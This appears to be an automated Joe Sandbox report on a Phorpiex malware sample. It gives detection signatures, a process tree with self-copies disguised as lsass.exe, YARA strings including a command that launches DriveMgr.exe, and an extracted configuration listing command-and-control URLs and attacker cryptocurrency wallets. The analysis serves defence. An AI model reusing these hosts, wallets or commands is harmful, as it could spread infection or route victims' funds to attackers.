Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
6K1uYM85lS.exe

Overview

General Information

Sample name:6K1uYM85lS.exe
renamed because original name is a hash value
Original sample name:8cd916321f1c8a63bd9fafb52a478ac65b3e86a33966bbfce60f5e46ffee6b8c.exe
Analysis ID:1372442
MD5:2d5e7babf1b2d92b56fda0b9044f889a
SHA1:d2f1f6a1e267172fc183a0d1a2affdd26145f59d
SHA256:8cd916321f1c8a63bd9fafb52a478ac65b3e86a33966bbfce60f5e46ffee6b8c
Tags:exe
Infos:

Detection

Phorpiex
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Phorpiex
Changes security center settings (notifications, updates, antivirus, firewall)
Drops PE files with benign system names
Found Tor onion address
Found evasive API chain (may stop execution after checking mutex)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to detect the country of the analysis system (by using the IP)
Uses known network protocols on non-standard ports
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (may stop execution after accessing registry keys)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

  • System is w10x64
  • 6K1uYM85lS.exe (PID: 3200 cmdline: C:\Users\user\Desktop\6K1uYM85lS.exe MD5: 2D5E7BABF1B2D92B56FDA0B9044F889A)
    • lsass.exe (PID: 4596 cmdline: C:\180771693628709\lsass.exe MD5: 2D5E7BABF1B2D92B56FDA0B9044F889A)
  • lsass.exe (PID: 5308 cmdline: "C:\180771693628709\lsass.exe" MD5: 2D5E7BABF1B2D92B56FDA0B9044F889A)
  • lsass.exe (PID: 2884 cmdline: "C:\180771693628709\lsass.exe" MD5: 2D5E7BABF1B2D92B56FDA0B9044F889A)
  • lsass.exe (PID: 3320 cmdline: "C:\180771693628709\lsass.exe" MD5: 2D5E7BABF1B2D92B56FDA0B9044F889A)
  • cleanup
{"C2 url": ["http://api.wipmania.com/", "http://7fv5nq57k4qvbrpt.onion/", "http://185.215.113.93/", "http://feedmefile.top/", "http://gotsomefile.top/", "http://gimmefile.top/"], "Wallet": ["11650607608992768899L", "15DBeUGFSQLbpYvWLJwzHUXSRrHNU9uQuS8c2wvFLZ7Nxz3N", "1E5ZxnNUbbGQarWjMA7tCwp3Btm38GvRkv", "3AcMV5pSUcxMmmcMbfSkJXRKbCrF3ysUDJ", "bitcoincash:qqucl3fev20z4upudppa8p5hd6j3zzgyfuwae00pfr", "XkcKjKZqNUkChwJXMj5uDjDns6etXvakir", "D7MYki8urW3xq8sZJ8Q2v2ZrHxjzp7ACvb", "0x76e4CB2fcf7f931Fd750e93F443536Ee068d1cdE", "LfYFvpk2hccXw12tN3BBMWh7EcUBMbKoTG", "rUQFcff9R1eKAwTtR1wbuQxmcoB236mz44", "TEUaG7jyXdyrDS3JeEg1w1hotmmEMjx4TB", "t1gTRxsrEXwky32j22jgFRZAafBzmCV2M2V", "tz1ZT5ezLqmcqPANNCHRGtjv7YmxU4Yqu9FY", "hx5f9a4862a5b87d76d60b8ae85e229f892279d49a", "QWU6ht2csXYcfG4KQW8yUxJtBQfCCjqvJQ", "RTWARPyPyMgJSUNELV6wkSThjh2ub5CyzE", "ND2BUO56NOATM7KNB6EFEJSJX3GKYS2BD35BPEAE", "AT5Vm3ZrUg98s9kBue2g9YjnwK4kFKhQw3", "SdRjRfVx6vKYW7jfpAGSN5pqBSF9WC89wd", "zil1vmhlqflzamfx0qfn5cykze2hkvmxx3tfs72gxt", "s1j6xPi597KmKbLDAz1EaetoMFys2F1p8zw"]}
SourceRuleDescriptionAuthorStrings
6K1uYM85lS.exeMALWARE_Win_PhorpiexDetects Phorpiex variantsditekSHen
  • 0x159f0:$s2: /c start __ & __\DriveMgr.exe & exit
  • 0x157b4:$s5: %ls\%d%d
  • 0x158e0:$s5: %ls\%d%d
  • 0x15bd8:$s5: %ls\%d%d
  • 0x15f2c:$s5: %ls\%d%d
  • 0x150b0:$s6: bitcoincash:
  • 0x150d0:$s6: bitcoincash:
  • 0x15174:$s6: bitcoincash:
  • 0x1541c:$s6: bitcoincash:
  • 0x15f54:$s7: %ls:*:Enabled:%ls
  • 0x15a84:$s8: %s\%s\DriveMgr.exe
  • 0x15713:$s9: api.wipmania.com
SourceRuleDescriptionAuthorStrings
C:\180771693628709\lsass.exeMALWARE_Win_PhorpiexDetects Phorpiex variantsditekSHen
  • 0x159f0:$s2: /c start __ & __\DriveMgr.exe & exit
  • 0x157b4:$s5: %ls\%d%d
  • 0x158e0:$s5: %ls\%d%d
  • 0x15bd8:$s5: %ls\%d%d
  • 0x15f2c:$s5: %ls\%d%d
  • 0x150b0:$s6: bitcoincash:
  • 0x150d0:$s6: bitcoincash:
  • 0x15174:$s6: bitcoincash:
  • 0x1541c:$s6: bitcoincash:
  • 0x15f54:$s7: %ls:*:Enabled:%ls
  • 0x15a84:$s8: %s\%s\DriveMgr.exe
  • 0x15713:$s9: api.wipmania.com
SourceRuleDescriptionAuthorStrings
Process Memory Space: 6K1uYM85lS.exe PID: 3200JoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
    Process Memory Space: lsass.exe PID: 4596JoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
      Process Memory Space: lsass.exe PID: 5308JoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
        Process Memory Space: lsass.exe PID: 2884JoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
          Process Memory Space: lsass.exe PID: 3320JoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
            SourceRuleDescriptionAuthorStrings
            0.2.6K1uYM85lS.exe.9a0000.0.unpackMALWARE_Win_PhorpiexDetects Phorpiex variantsditekSHen
            • 0x159f0:$s2: /c start __ & __\DriveMgr.exe & exit
            • 0x157b4:$s5: %ls\%d%d
            • 0x158e0:$s5: %ls\%d%d
            • 0x15bd8:$s5: %ls\%d%d
            • 0x15f2c:$s5: %ls\%d%d
            • 0x150b0:$s6: bitcoincash:
            • 0x150d0:$s6: bitcoincash:
            • 0x15174:$s6: bitcoincash:
            • 0x1541c:$s6: bitcoincash:
            • 0x15f54:$s7: %ls:*:Enabled:%ls
            • 0x15a84:$s8: %s\%s\DriveMgr.exe
            • 0x15713:$s9: api.wipmania.com
            6.2.lsass.exe.770000.0.unpackMALWARE_Win_PhorpiexDetects Phorpiex variantsditekSHen
            • 0x159f0:$s2: /c start __ & __\DriveMgr.exe & exit
            • 0x157b4:$s5: %ls\%d%d
            • 0x158e0:$s5: %ls\%d%d
            • 0x15bd8:$s5: %ls\%d%d
            • 0x15f2c:$s5: %ls\%d%d
            • 0x150b0:$s6: bitcoincash:
            • 0x150d0:$s6: bitcoincash:
            • 0x15174:$s6: bitcoincash:
            • 0x1541c:$s6: bitcoincash:
            • 0x15f54:$s7: %ls:*:Enabled:%ls
            • 0x15a84:$s8: %s\%s\DriveMgr.exe
            • 0x15713:$s9: api.wipmania.com
            8.0.lsass.exe.770000.0.unpackMALWARE_Win_PhorpiexDetects Phorpiex variantsditekSHen
            • 0x159f0:$s2: /c start __ & __\DriveMgr.exe & exit
            • 0x157b4:$s5: %ls\%d%d
            • 0x158e0:$s5: %ls\%d%d
            • 0x15bd8:$s5: %ls\%d%d
            • 0x15f2c:$s5: %ls\%d%d
            • 0x150b0:$s6: bitcoincash:
            • 0x150d0:$s6: bitcoincash:
            • 0x15174:$s6: bitcoincash:
            • 0x1541c:$s6: bitcoincash:
            • 0x15f54:$s7: %ls:*:Enabled:%ls
            • 0x15a84:$s8: %s\%s\DriveMgr.exe
            • 0x15713:$s9: api.wipmania.com
            0.0.6K1uYM85lS.exe.9a0000.0.unpackMALWARE_Win_PhorpiexDetects Phorpiex variantsditekSHen
            • 0x159f0:$s2: /c start __ & __\DriveMgr.exe & exit
            • 0x157b4:$s5: %ls\%d%d
            • 0x158e0:$s5: %ls\%d%d
            • 0x15bd8:$s5: %ls\%d%d
            • 0x15f2c:$s5: %ls\%d%d
            • 0x150b0:$s6: bitcoincash:
            • 0x150d0:$s6: bitcoincash:
            • 0x15174:$s6: bitcoincash:
            • 0x1541c:$s6: bitcoincash:
            • 0x15f54:$s7: %ls:*:Enabled:%ls
            • 0x15a84:$s8: %s\%s\DriveMgr.exe
            • 0x15713:$s9: api.wipmania.com
            5.2.lsass.exe.770000.0.unpackMALWARE_Win_PhorpiexDetects Phorpiex variantsditekSHen
            • 0x159f0:$s2: /c start __ & __\DriveMgr.exe & exit
            • 0x157b4:$s5: %ls\%d%d
            • 0x158e0:$s5: %ls\%d%d
            • 0x15bd8:$s5: %ls\%d%d
            • 0x15f2c:$s5: %ls\%d%d
            • 0x150b0:$s6: bitcoincash:
            • 0x150d0:$s6: bitcoincash:
            • 0x15174:$s6: bitcoincash:
            • 0x1541c:$s6: bitcoincash:
            • 0x15f54:$s7: %ls:*:Enabled:%ls
            • 0x15a84:$s8: %s\%s\DriveMgr.exe
            • 0x15713:$s9: api.wipmania.com
            Click to see the 4 entries
            No Sigma rule has matched
            No Snort rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 6K1uYM85lS.exeAvira: detected
            Source: http://185.215.113.93/c1Avira URL Cloud: Label: malware
            Source: http://185.215.113.93/c2Avira URL Cloud: Label: malware
            Source: https://131.188.40.189:443/tor/status-vote/current/consensus.zAvira URL Cloud: Label: malware
            Source: http://199.58.81.140/tor/status-vote/current/consensus.zAvira URL Cloud: Label: malware
            Source: http://185.215.113.93/Avira URL Cloud: Label: malware
            Source: http://feedmefile.top/Avira URL Cloud: Label: malware
            Source: http://86.59.21.38/tor/status-vote/current/consensus.zAvira URL Cloud: Label: malware
            Source: http://gimmefile.top/Avira URL Cloud: Label: malware
            Source: http://gotsomefile.top/Avira URL Cloud: Label: malware
            Source: http://185.215.113.93/c6Avira URL Cloud: Label: malware
            Source: http://185.215.113.93/c5Avira URL Cloud: Label: malware
            Source: http://185.215.113.93/c4Avira URL Cloud: Label: malware
            Source: http://185.215.113.93/c3Avira URL Cloud: Label: malware
            Source: C:\180771693628709\lsass.exeAvira: detection malicious, Label: HEUR/AGEN.1360733
            Source: 8.2.lsass.exe.770000.0.unpackMalware Configuration Extractor: Phorpiex {"C2 url": ["http://api.wipmania.com/", "http://7fv5nq57k4qvbrpt.onion/", "http://185.215.113.93/", "http://feedmefile.top/", "http://gotsomefile.top/", "http://gimmefile.top/"], "Wallet": ["11650607608992768899L", "15DBeUGFSQLbpYvWLJwzHUXSRrHNU9uQuS8c2wvFLZ7Nxz3N", "1E5ZxnNUbbGQarWjMA7tCwp3Btm38GvRkv", "3AcMV5pSUcxMmmcMbfSkJXRKbCrF3ysUDJ", "bitcoincash:qqucl3fev20z4upudppa8p5hd6j3zzgyfuwae00pfr", "XkcKjKZqNUkChwJXMj5uDjDns6etXvakir", "D7MYki8urW3xq8sZJ8Q2v2ZrHxjzp7ACvb", "0x76e4CB2fcf7f931Fd750e93F443536Ee068d1cdE", "LfYFvpk2hccXw12tN3BBMWh7EcUBMbKoTG", "rUQFcff9R1eKAwTtR1wbuQxmcoB236mz44", "TEUaG7jyXdyrDS3JeEg1w1hotmmEMjx4TB", "t1gTRxsrEXwky32j22jgFRZAafBzmCV2M2V", "tz1ZT5ezLqmcqPANNCHRGtjv7YmxU4Yqu9FY", "hx5f9a4862a5b87d76d60b8ae85e229f892279d49a", "QWU6ht2csXYcfG4KQW8yUxJtBQfCCjqvJQ", "RTWARPyPyMgJSUNELV6wkSThjh2ub5CyzE", "ND2BUO56NOATM7KNB6EFEJSJX3GKYS2BD35BPEAE", "AT5Vm3ZrUg98s9kBue2g9YjnwK4kFKhQw3", "SdRjRfVx6vKYW7jfpAGSN5pqBSF9WC89wd", "zil1vmhlqflzamfx0qfn5cykze2hkvmxx3tfs72gxt", "s1j6xPi597KmKbLDAz1EaetoMFys2F1p8zw"]}
            Source: gimmefile.topVirustotal: Detection: 10%Perma Link
            Source: feedmefile.topVirustotal: Detection: 8%Perma Link
            Source: gotsomefile.topVirustotal: Detection: 8%Perma Link
            Source: C:\180771693628709\lsass.exeReversingLabs: Detection: 72%
            Source: 6K1uYM85lS.exeReversingLabs: Detection: 72%
            Source: 6K1uYM85lS.exeVirustotal: Detection: 70%Perma Link
            Source: C:\180771693628709\lsass.exeJoe Sandbox ML: detected
            Source: 6K1uYM85lS.exeJoe Sandbox ML: detected

            Location Tracking

            barindex
            Source: unknownDNS query: name: api.wipmania.com
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeCode function: 0_2_009B1360 Sleep,FindWindowA,Sleep,DeleteFileW,MoveFileW,MoveFileA,Sleep,DeleteFileW,MoveFileW,Sleep,DeleteFileA,Sleep,DeleteFileW,Sleep,MoveFileW,DeleteFileW,MoveFileW,DeleteFileW,Sleep,DeleteFileW,Sleep,MoveFileW,InternetOpenA,DeleteFileW,DeleteFileW,MoveFileW,Sleep,DeleteFileW,Sleep,DeleteFileW,InternetOpenUrlA,Sleep,MoveFileW,DeleteFileW,Sleep,MoveFileA,Sleep,DeleteFileA,InternetCloseHandle,DeleteFileW,Sleep,InternetCloseHandle,Sleep,ShowWindow,DeleteFileW,SetForegroundWindow,DeleteFileW,CloseWindow,MoveFileA,MoveFileW,DeleteFileW,MoveFileW,Sleep,DeleteFileW,DeleteFileA,FindWindowA,InternetOpenA,MoveFileW,Sleep,MoveFileW,DeleteFileW,InternetOpenUrlA,MoveFileW,DeleteFileW,Sleep,MoveFileW,MoveFileA,Sleep,DeleteFileW,InternetCloseHandle,Sleep,InternetCloseHandle,Sleep,MoveFileW,ShowWindow,DeleteFileW,SetForegroundWindow,Sleep,InternetOpenA,InternetOpenUrlA,DeleteFileW,MoveFileW,Sleep,DeleteFileW,InternetCloseHandle,DeleteFileW,Sleep,MoveFileA,DeleteFileW,MoveFileW,DeleteFileA,Sleep,InternetCloseHandle,FindWindowA,MoveFileW,Sleep,DeleteFileW,MoveFileW,Sleep,DeleteFileW,Sleep,PathFileExistsA,DeleteFileA,Sleep,DeleteFileW,Sleep,MoveFileW,FindWindowA,Sleep,DeleteFileW,SetForegroundWindow,Sleep,ShowWindow,Sleep,MoveFileA,DeleteFileA,ShowWindow,Sleep,DeleteFileW,MoveFileW,Sleep,MoveFileW,PathFileExistsW,MoveFileW,Sleep,FindWindowA,DeleteFileA,SetForegroundWindow,MoveFileW,SetFocus,DeleteFileW,DeleteFileW,Sleep,Sleep,MoveFileW,Sleep,DeleteFileW,Sleep,ExitProcess,CreateMutexA,GetLastError,ExitProcess,PathFileExistsW,MoveFileA,Sleep,CopyFileA,MoveFileA,MoveFileA,DeleteFileA,Sleep,FindWindowA,MoveFileW,CopyFileA,MoveFileW,DeleteFileA,MoveFileA,Sleep,CopyFileA,MoveFileW,MoveFileW,FindWindowA,MoveFileA,Sleep,DeleteFileW,MoveFileA,Sleep,MoveFileA,InternetOpenA,DeleteFileA,CopyFileA,DeleteFileA,InternetOpenUrlA,DeleteFileW,Sleep,InternetCloseHandle,Sleep,InternetCloseHandle,PathFileExistsA,MoveFileA,MoveFileA,MoveFileA,FindWindowA,CopyFileA,MoveFileA,CloseWindow,Sleep,MoveFileA,MoveFileW,SetForegroundWindow,Sleep,SetFocus,MoveFileA,FindWindowA,InternetOpenA,Sleep,InternetOpenUrlA,Sleep,MoveFileA,DeleteFileA,MoveFileW,InternetCloseHandle,Sleep,InternetCloseHandle,Sleep,SetForegroundWindow,DeleteFileA,ShowWindow,DeleteFileW,Sleep,InternetOpenA,InternetOpenUrlA,MoveFileA,InternetCloseHandle,Sleep,MoveFileA,DeleteFileW,Sleep,InternetCloseHandle,FindWindowA,MoveFileA,DeleteFileW,MoveFileA,Sleep,GetModuleFileNameW,PathFindFileNameW,CryptAcquireContextW,CoInitializeEx,wsprintfW,DeleteFileW,GetTickCount,srand,Sleep,wcscmp,Sleep,FindWindowA,MoveFileW,MoveFileA,CopyFileA,DeleteFileA,MoveFileW,Sleep,DeleteFileW,CopyFileA,PathFileExistsA,MoveFileW,DeleteFileA,MoveFileA,DeleteFileA,FindWindowA,MoveFileA,ShowWindow,MoveFileW,Sleep,MoveFileW,ShowWindow,CopyFileA,CloseWindow,InternetOpenA,InternetOpenUrlA,DeleteFileA,Sleep,DeleteFileA,InternetCloseHandle,Sleep,InternetCloseHandle,Sleep,ShowWindow,Sleep,SetForegroundWindow,DeleteFileW,SetFocus,CloseWindow,DeleteFileA,FindWi0_2_009B1360
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeCode function: 0_2_009A2C90 memmove,CryptImportKey,CryptExportKey,CryptDestroyKey,0_2_009A2C90
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeCode function: 0_2_009A2680 memmove,CryptImportKey,CryptSetKeyParam,memmove,CryptDestroyKey,0_2_009A2680
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeCode function: 0_2_009A22B0 CryptGenRandom,0_2_009A22B0
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeCode function: 0_2_009A28F0 CryptDestroyKey,0_2_009A28F0
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeCode function: 0_2_009A2420 CryptImportKey,CryptGetKeyParam,CryptDestroyKey,0_2_009A2420
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeCode function: 0_2_009A2250 CryptReleaseContext,CryptReleaseContext,0_2_009A2250
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeCode function: 0_2_009A2A60 CryptDestroyHash,0_2_009A2A60
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeCode function: 0_2_009AFE60 CryptImportKey,CreateFileW,GetFileSize,CreateFileMappingA,MapViewOfFile,CryptCreateHash,GetProcessHeap,HeapAlloc,CryptHashData,CryptVerifySignatureA,memcpy,GetProcessHeap,HeapFree,UnmapViewOfFile,CloseHandle,SetFilePointer,SetEndOfFile,CloseHandle,CryptDestroyKey,0_2_009AFE60
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeCode function: 0_2_009AFD80 memcpy,memcpy,CryptImportKey,CryptEncrypt,CryptDestroyKey,0_2_009AFD80
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeCode function: 0_2_009A25A0 CryptDestroyKey,0_2_009A25A0
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeCode function: 0_2_009A25D0 memmove,CryptEncrypt,0_2_009A25D0
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeCode function: 0_2_009A23C0 CryptEncrypt,0_2_009A23C0
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeCode function: 0_2_009A29F0 CryptHashData,CryptDuplicateHash,CryptGetHashParam,CryptDestroyHash,0_2_009A29F0
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeCode function: 0_2_009A2120 memmove,CryptAcquireContextA,CryptAcquireContextA,CryptReleaseContext,CryptReleaseContext,0_2_009A2120
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeCode function: 0_2_009A2970 CryptCreateHash,CryptHashData,CryptDestroyHash,0_2_009A2970
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeCode function: 0_2_009A2B60 memmove,memmove,CryptImportKey,CryptExportKey,CryptDestroyKey,0_2_009A2B60
            Source: C:\180771693628709\lsass.exeCode function: 5_2_00781360 Sleep,FindWindowA,Sleep,DeleteFileW,MoveFileW,MoveFileA,Sleep,DeleteFileW,MoveFileW,Sleep,DeleteFileA,Sleep,DeleteFileW,Sleep,MoveFileW,DeleteFileW,MoveFileW,DeleteFileW,Sleep,DeleteFileW,Sleep,MoveFileW,InternetOpenA,DeleteFileW,DeleteFileW,MoveFileW,Sleep,DeleteFileW,Sleep,DeleteFileW,InternetOpenUrlA,Sleep,MoveFileW,DeleteFileW,Sleep,MoveFileA,Sleep,DeleteFileA,InternetCloseHandle,DeleteFileW,Sleep,InternetCloseHandle,Sleep,ShowWindow,DeleteFileW,SetForegroundWindow,DeleteFileW,CloseWindow,MoveFileA,MoveFileW,DeleteFileW,MoveFileW,Sleep,DeleteFileW,DeleteFileA,FindWindowA,InternetOpenA,MoveFileW,Sleep,MoveFileW,DeleteFileW,InternetOpenUrlA,MoveFileW,DeleteFileW,Sleep,MoveFileW,MoveFileA,Sleep,DeleteFileW,InternetCloseHandle,Sleep,InternetCloseHandle,Sleep,MoveFileW,ShowWindow,DeleteFileW,SetForegroundWindow,Sleep,InternetOpenA,InternetOpenUrlA,DeleteFileW,MoveFileW,Sleep,DeleteFileW,InternetCloseHandle,DeleteFileW,Sleep,MoveFileA,DeleteFileW,MoveFileW,DeleteFileA,Sleep,InternetCloseHandle,FindWindowA,MoveFileW,Sleep,DeleteFileW,MoveFileW,Sleep,DeleteFileW,Sleep,PathFileExistsA,DeleteFileA,Sleep,DeleteFileW,Sleep,MoveFileW,FindWindowA,Sleep,DeleteFileW,SetForegroundWindow,Sleep,ShowWindow,Sleep,MoveFileA,DeleteFileA,ShowWindow,Sleep,DeleteFileW,MoveFileW,Sleep,MoveFileW,PathFileExistsW,MoveFileW,Sleep,FindWindowA,DeleteFileA,SetForegroundWindow,MoveFileW,SetFocus,DeleteFileW,DeleteFileW,Sleep,Sleep,MoveFileW,Sleep,DeleteFileW,Sleep,ExitProcess,CreateMutexA,GetLastError,ExitProcess,PathFileExistsW,MoveFileA,Sleep,CopyFileA,MoveFileA,MoveFileA,DeleteFileA,Sleep,FindWindowA,MoveFileW,CopyFileA,MoveFileW,DeleteFileA,MoveFileA,Sleep,CopyFileA,MoveFileW,MoveFileW,FindWindowA,MoveFileA,Sleep,DeleteFileW,MoveFileA,Sleep,MoveFileA,InternetOpenA,DeleteFileA,CopyFileA,DeleteFileA,InternetOpenUrlA,DeleteFileW,Sleep,InternetCloseHandle,Sleep,InternetCloseHandle,PathFileExistsA,MoveFileA,MoveFileA,MoveFileA,FindWindowA,CopyFileA,MoveFileA,CloseWindow,Sleep,MoveFileA,MoveFileW,SetForegroundWindow,Sleep,SetFocus,MoveFileA,FindWindowA,InternetOpenA,Sleep,InternetOpenUrlA,Sleep,MoveFileA,DeleteFileA,MoveFileW,InternetCloseHandle,Sleep,InternetCloseHandle,Sleep,SetForegroundWindow,DeleteFileA,ShowWindow,DeleteFileW,Sleep,InternetOpenA,InternetOpenUrlA,MoveFileA,InternetCloseHandle,Sleep,MoveFileA,DeleteFileW,Sleep,InternetCloseHandle,FindWindowA,MoveFileA,DeleteFileW,MoveFileA,Sleep,GetModuleFileNameW,PathFindFileNameW,CryptAcquireContextW,CoInitializeEx,wsprintfW,DeleteFileW,GetTickCount,srand,Sleep,wcscmp,Sleep,FindWindowA,MoveFileW,MoveFileA,CopyFileA,DeleteFileA,MoveFileW,Sleep,DeleteFileW,CopyFileA,PathFileExistsA,MoveFileW,DeleteFileA,MoveFileA,DeleteFileA,FindWindowA,MoveFileA,ShowWindow,MoveFileW,Sleep,MoveFileW,ShowWindow,CopyFileA,CloseWindow,InternetOpenA,InternetOpenUrlA,DeleteFileA,Sleep,DeleteFileA,InternetCloseHandle,Sleep,InternetCloseHandle,Sleep,ShowWindow,Sleep,SetForegroundWindow,DeleteFileW,SetFocus,CloseWindow,DeleteFileA,FindWi5_2_00781360
            Source: C:\180771693628709\lsass.exeCode function: 5_2_00772A60 CryptDestroyHash,5_2_00772A60
            Source: C:\180771693628709\lsass.exeCode function: 5_2_0077FE60 CryptImportKey,CreateFileW,GetFileSize,CreateFileMappingA,MapViewOfFile,CryptCreateHash,GetProcessHeap,HeapAlloc,CryptHashData,CryptVerifySignatureA,memcpy,GetProcessHeap,HeapFree,UnmapViewOfFile,CloseHandle,SetFilePointer,SetEndOfFile,CloseHandle,CryptDestroyKey,5_2_0077FE60
            Source: C:\180771693628709\lsass.exeCode function: 5_2_00772250 CryptReleaseContext,CryptReleaseContext,5_2_00772250
            Source: C:\180771693628709\lsass.exeCode function: 5_2_00772420 CryptImportKey,CryptGetKeyParam,CryptDestroyKey,5_2_00772420
            Source: C:\180771693628709\lsass.exeCode function: 5_2_007728F0 CryptDestroyKey,5_2_007728F0
            Source: C:\180771693628709\lsass.exeCode function: 5_2_007722B0 CryptGenRandom,5_2_007722B0
            Source: C:\180771693628709\lsass.exeCode function: 5_2_00772C90 memmove,CryptImportKey,CryptExportKey,CryptDestroyKey,5_2_00772C90
            Source: C:\180771693628709\lsass.exeCode function: 5_2_00772680 memmove,CryptImportKey,CryptSetKeyParam,memmove,CryptDestroyKey,5_2_00772680
            Source: C:\180771693628709\lsass.exeCode function: 5_2_00772970 CryptCreateHash,CryptHashData,CryptDestroyHash,5_2_00772970
            Source: C:\180771693628709\lsass.exeCode function: 5_2_00772B60 memmove,memmove,CryptImportKey,CryptExportKey,CryptDestroyKey,5_2_00772B60
            Source: C:\180771693628709\lsass.exeCode function: 5_2_00772120 memmove,CryptAcquireContextA,CryptAcquireContextA,CryptReleaseContext,CryptReleaseContext,5_2_00772120
            Source: C:\180771693628709\lsass.exeCode function: 5_2_007729F0 CryptHashData,CryptDuplicateHash,CryptGetHashParam,CryptDestroyHash,5_2_007729F0
            Source: C:\180771693628709\lsass.exeCode function: 5_2_007725D0 memmove,CryptEncrypt,5_2_007725D0
            Source: C:\180771693628709\lsass.exeCode function: 5_2_007723C0 CryptEncrypt,5_2_007723C0
            Source: C:\180771693628709\lsass.exeCode function: 5_2_007725A0 CryptDestroyKey,5_2_007725A0
            Source: C:\180771693628709\lsass.exeCode function: 5_2_0077FD80 memcpy,memcpy,CryptImportKey,CryptEncrypt,CryptDestroyKey,5_2_0077FD80

            Phishing

            barindex
            Source: Yara matchFile source: Process Memory Space: 6K1uYM85lS.exe PID: 3200, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: lsass.exe PID: 4596, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: lsass.exe PID: 5308, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: lsass.exe PID: 2884, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: lsass.exe PID: 3320, type: MEMORYSTR
            Source: 6K1uYM85lS.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 149.56.44.47:443 -> 192.168.2.6:49729 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 172.81.131.84:443 -> 192.168.2.6:49732 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 207.244.78.230:443 -> 192.168.2.6:49735 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 66.175.235.244:443 -> 192.168.2.6:49736 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 172.81.131.84:443 -> 192.168.2.6:49759 version: TLS 1.0
            Source: 6K1uYM85lS.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeCode function: 0_2_009B09F0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_009B09F0
            Source: C:\Users\user\Desktop\6K1uYM85lS.exeCode function: 0_2_009B0B30 wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,0_2_009B0B30
            Source: C:\180771693628709\lsass.exeCode function: 5_2_00780B30 wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,5_2_00780B30
            Source: C:\180771693628709\lsass.exeCode function: 5_2_007809F0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,5_2_007809F0

            Networking

            barindex
            Source: 6K1uYM85lS.exeString found in binary or memory: http://7fv5nq57k4qvbrpt.onion/
